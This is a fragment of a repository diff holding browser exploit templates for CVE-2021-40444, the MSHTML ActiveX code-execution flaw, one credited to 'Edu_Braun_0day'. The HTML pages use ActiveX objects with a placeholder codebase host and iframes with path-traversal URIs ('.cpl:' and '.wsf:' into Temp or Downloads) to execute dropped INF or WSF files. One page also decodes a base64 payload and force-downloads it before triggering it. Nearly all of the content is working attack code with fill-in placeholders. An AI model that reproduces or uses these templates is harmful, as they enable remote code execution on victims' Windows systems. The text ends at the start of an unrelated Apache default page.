||||||
|
// AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA |
||||||
|
// AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA |
||||||
|
// AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA |
||||||
|
// AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA |
||||||
|
// AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA |
||||||
|
// AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA |
||||||
|
// AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA |
||||||
|
// AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA |
||||||
|
// AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA |
||||||
|
// AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA |
||||||
|
// AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA |
||||||
|
// AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA |
||||||
|
// AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA |
||||||
|
// AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA |
||||||
|
// AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA |
||||||
|
// AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA |
||||||
|
// AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA |
||||||
|
// AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA |
||||||
|
// AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA |
||||||
|
// AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA |
||||||
|
// AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA |
||||||
|
// AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA |
||||||
|
// AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA |
||||||
|
// AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA |
||||||
|
// AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA |
||||||
|
// AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA |
||||||
|
// AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA |
||||||
|
// AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA |
||||||
|
// AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA |
||||||
|
// AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA |
||||||
|
|
||||||
|
|
||||||
|
var obj = document.createElement("object"); |
||||||
|
obj.setAttribute("codebase", '<HOST_CHANGE_HERE>#version=5,0,0,0'); |
||||||
|
obj.setAttribute("classid", 'CLSID:edbc374c-5730-432a-b5b8-de94f0b57217'); |
||||||
|
var i = document.createElement("iframe"); |
||||||
|
document.documentElement.appendChild(i); |
||||||
|
i.src = ".cpl:../../../AppData/Local/Temp/<INF_CHANGE_HERE>"; |
||||||
|
|
||||||
|
i = document.createElement("iframe"); |
||||||
|
document.documentElement.appendChild(i); |
||||||
|
i.src = "<URI_SCHEME_HERE>:../../../AppData/Local/Temp/<INF_CHANGE_HERE>?<URI_SCHEME_HERE>"; |
||||||
|
|
||||||
|
</script> |
||||||
|
|
||||||
|
</body> |
||||||
|
</html> |
File diff suppressed because one or more lines are too long
@ -0,0 +1,68 @@ |
|||||||
|
<!DOCTYPE html> |
||||||
|
<html lang="en"> |
||||||
|
<head> |
||||||
|
<meta charset="UTF-8"> |
||||||
|
<title>CVE-2021-40444 (Cab-less)</title> |
||||||
|
</head> |
||||||
|
<body> |
||||||
|
<!--Cab-less exploitation by Edu_Braun_0day--> |
||||||
|
|
||||||
|
<script> |
||||||
|
new ActiveXObject('htmlfile').Script.location = '.wsf:../../../Downloads/<RAR_CHANGE_HERE>?.wsf'; |
||||||
|
|
||||||
|
var i = document.createElement("iframe"); |
||||||
|
document.documentElement.appendChild(i); |
||||||
|
i.src = '.wsf:../../../Downloads/<RAR_CHANGE_HERE>?.wsf'; |
||||||
|
|
||||||
|
|
||||||
|
// AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA |
||||||
|
// AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA |
||||||
|
// AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA |
||||||
|
// AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA |
||||||
|
// AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA |
||||||
|
// AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA |
||||||
|
// AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA |
||||||
|
// AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA |
||||||
|
// AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA |
||||||
|
// AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA |
||||||
|
// AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA |
||||||
|
// AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA |
||||||
|
// AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA |
||||||
|
// AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA |
||||||
|
// AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA |
||||||
|
// AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA |
||||||
|
// AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA |
||||||
|
// AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA |
||||||
|
// AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA |
||||||
|
// AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA |
||||||
|
// AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA |
||||||
|
// AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA |
||||||
|
// AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA |
||||||
|
// AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA |
||||||
|
// AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA |
||||||
|
// AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA |
||||||
|
// AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA |
||||||
|
// AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA |
||||||
|
// AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA |
||||||
|
// AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA |
||||||
|
// AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA |
||||||
|
// AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA |
||||||
|
// AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA |
||||||
|
// AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA |
||||||
|
// AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA |
||||||
|
// AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA |
||||||
|
// AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA |
||||||
|
// AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA |
||||||
|
// AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA |
||||||
|
// AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA |
||||||
|
// AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA |
||||||
|
// AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA |
||||||
|
// AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA |
||||||
|
// AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA |
||||||
|
// AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA |
||||||
|
// AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA |
||||||
|
// AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA |
||||||
|
|
||||||
|
</script> |
||||||
|
</body> |
||||||
|
</html> |
@ -0,0 +1,109 @@ |
|||||||
|
<!DOCTYPE html> |
||||||
|
<html lang="en"> |
||||||
|
<head> |
||||||
|
<meta charset="UTF-8"> |
||||||
|
<title>CVE-2021-40444 (Cab-less)</title> |
||||||
|
</head> |
||||||
|
<body> |
||||||
|
<script> |
||||||
|
function base64ToArrayBuffer(base64) { |
||||||
|
const binary_string = window.atob(base64); |
||||||
|
const len = binary_string.length; |
||||||
|
var bytes = new Uint8Array(len); |
||||||
|
for (let i = 0; i < len; i++) { bytes[i] = binary_string.charCodeAt(i);} |
||||||
|
return bytes.buffer; |
||||||
|
} |
||||||
|
|
||||||
|
function isIE() { |
||||||
|
ua = navigator.userAgent; |
||||||
|
return ua.indexOf("MSIE ") > -1 || ua.indexOf("Trident/") > -1; |
||||||
|
} |
||||||
|
|
||||||
|
function save() |
||||||
|
{ |
||||||
|
var file = '<BASE64_DATA_HERE>'; |
||||||
|
|
||||||
|
var data = base64ToArrayBuffer(file); |
||||||
|
var blob = new Blob([data], {type: '<MIME_TYPE_HERE>'}); |
||||||
|
|
||||||
|
var fileName = '<INF_CHANGE_HERE>'; |
||||||
|
|
||||||
|
if (isIE()) { |
||||||
|
navigator.msSaveBlob(blob, fileName); |
||||||
|
} else { |
||||||
|
var a = document.createElement('a'); |
||||||
|
document.body.appendChild(a); |
||||||
|
a.style = 'display: none'; |
||||||
|
var url = window.URL.createObjectURL(blob); |
||||||
|
a.href = url; |
||||||
|
a.download = fileName; |
||||||
|
a.click(); |
||||||
|
window.URL.revokeObjectURL(url); |
||||||
|
} |
||||||
|
} |
||||||
|
|
||||||
|
</script> |
||||||
|
<script> |
||||||
|
function process(){ |
||||||
|
new ActiveXObject('htmlfile').Script.location = '<URI_SCHEME_HERE>:../../../Downloads/<INF_CHANGE_HERE>?<URI_SCHEME_HERE>'; |
||||||
|
|
||||||
|
var i = document.createElement("iframe"); |
||||||
|
document.documentElement.appendChild(i); |
||||||
|
i.src = '<URI_SCHEME_HERE>:../../../Downloads/<INF_CHANGE_HERE>?<URI_SCHEME_HERE>'; |
||||||
|
} |
||||||
|
|
||||||
|
// AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA |
||||||
|
// AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA |
||||||
|
// AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA |
||||||
|
// AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA |
||||||
|
// AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA |
||||||
|
// AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA |
||||||
|
// AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA |
||||||
|
// AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA |
||||||
|
// AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA |
||||||
|
// AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA |
||||||
|
// AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA |
||||||
|
// AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA |
||||||
|
// AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA |
||||||
|
// AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA |
||||||
|
// AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA |
||||||
|
// AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA |
||||||
|
// AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA |
||||||
|
// AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA |
||||||
|
// AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA |
||||||
|
// AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA |
||||||
|
// AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA |
||||||
|
// AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA |
||||||
|
// AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA |
||||||
|
// AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA |
||||||
|
// AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA |
||||||
|
// AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA |
||||||
|
// AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA |
||||||
|
// AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA |
||||||
|
// AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA |
||||||
|
// AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA |
||||||
|
// AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA |
||||||
|
// AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA |
||||||
|
// AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA |
||||||
|
// AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA |
||||||
|
// AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA |
||||||
|
// AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA |
||||||
|
// AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA |
||||||
|
// AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA |
||||||
|
// AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA |
||||||
|
// AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA |
||||||
|
// AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA |
||||||
|
// AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA |
||||||
|
// AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA |
||||||
|
// AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA |
||||||
|
// AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA |
||||||
|
// AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA |
||||||
|
// AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA |
||||||
|
|
||||||
|
</script> |
||||||
|
<script> |
||||||
|
save(); |
||||||
|
process(); |
||||||
|
</script> |
||||||
|
</body> |
||||||
|
</html> |
@ -0,0 +1,376 @@ |
|||||||
|
|
||||||
|
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> |
||||||
|
<html xmlns="http://www.w3.org/1999/xhtml"> |
||||||
|
<!-- |
||||||
|
Modified from the Debian original for Ubuntu |
||||||
|
Last updated: 2016-11-16 |
||||||
|
See: https://launchpad.net/bugs/1288690 |
||||||
|
--> |
||||||
|
<head> |
||||||
|
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /> |
||||||
|
<title>Apache2 Ubuntu Default Page: It works</title> |
||||||
|
<style type="text/css" media="screen"> |
||||||
|
* { |
||||||
|
margin: 0px 0px 0px 0px; |
||||||
|
padding: 0px 0px 0px 0px; |
||||||
|
} |
||||||
|
|
||||||
|
body, html { |
||||||
|
padding: 3px 3px 3px 3px; |
||||||
|
|
||||||
|
background-color: #D8DBE2; |
||||||
|
